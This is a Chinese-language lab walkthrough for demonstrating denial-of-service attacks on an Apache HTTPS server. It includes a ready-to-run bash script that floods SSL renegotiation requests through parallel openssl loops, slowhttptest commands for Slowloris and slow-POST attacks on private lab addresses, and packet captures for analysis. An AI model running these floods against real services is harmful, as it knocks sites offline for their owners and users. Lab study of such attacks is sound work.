包含3台主机
attact 作为攻击方,使用Centos7.2,安装slowhttptest server 作为被攻击服务器,安装有apached windows,用于访问 server的http及https服务,查看攻击效果安装apache ssl模块
yum install mod_ssl openssl
修改配置文件,使用我们刚才生成的的证书
vi /etc/httpd/conf.d/ssl.conf
SSLCertificateFile /etc/pki/tls/certs/server.crt SSLCertificateKeyFile /etc/pki/tls/private/server.key修改后,重启apached服务
systemctl restart httpd
yum -y install slowhttptest
查看帮助
slowhttptest -help
登录attact计算机 shell脚本 ,修改target ip
#!/bin/bash target=192.168.164.136 # IP port=443 parallel=100 thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect $target:$port 2>/dev/null; done } for x in `seq 1 $parallel`; do thc-ssl-dosit & done给脚本加上权限
chmod 777 ssl.sh
运行脚本,运行后观察CPU使用率。
./ssl.sh
停止脚本
pgrep ssl.sh | xargs kill -s 9
注意修改目标IP slowhttptest -c 1000 -H -g -i 10 -r 200 -t GET -u http://192.168.164.136 -x 24 -p 3 参数说明
-c target number of connections -H slow headers a.k.a. Slowloris (default) -g generate report -i interval between followup data in seconds (10) -r connections per seconds (50) -x max length在服务器上抓 包分析攻击 tcpdump -i ens33 -w slowloris.pcap "port 80"
slowhttptest -c 3000 -B -g -i 110 -r 200 -s 8192 -u http://192.168.164.128 -x 10 -p 3
参数说明
-c target number of connections -B slow body -g generate report -i interval between followup data in seconds (10) -s value of Content-Length header if needed -x max length在服务器上抓 包分析攻击 tcpdump -i ens33 -w slowpost.pcap "port 80"